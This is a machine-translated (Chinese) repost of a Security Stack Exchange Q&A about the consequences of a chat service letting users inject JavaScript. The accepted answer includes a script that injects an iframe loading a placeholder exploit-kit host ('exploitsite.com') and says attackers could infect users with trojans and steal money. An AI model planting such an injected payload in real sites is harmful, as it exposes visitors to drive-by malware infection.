在线聊天中Javascript漏洞的安全后果?
在线聊天中Javascript漏洞的安全后果?
提问于 2013-06-01 23:29:33
对于允许基本HTML的在线聊天,如果它们为潜在的黑客对聊天中的每个人执行javascript留下了一个开放的途径,会发生什么?
他们能做的最糟糕的事是什么?
回答 1
Security用户
回答已采纳
发布于 2013-06-01 23:48:45
创建新的iframe和加载开发工具包内的iframe。
<script language="JavaScript" type="text/javascript">
ifrm = document.createElement("IFRAME");
ifrm.setAttribute("src", "http://exploitsite.com/");
ifrm.style.width = 640+"px";
ifrm.style.height = 480+"px";
document.body.appendChild(ifrm);
</script>用木马感染用户,把他们当作机器人,偷他们的钱等等。
页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:
https://security.stackexchange.com/questions/36804
复制相关文章
相似问题
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号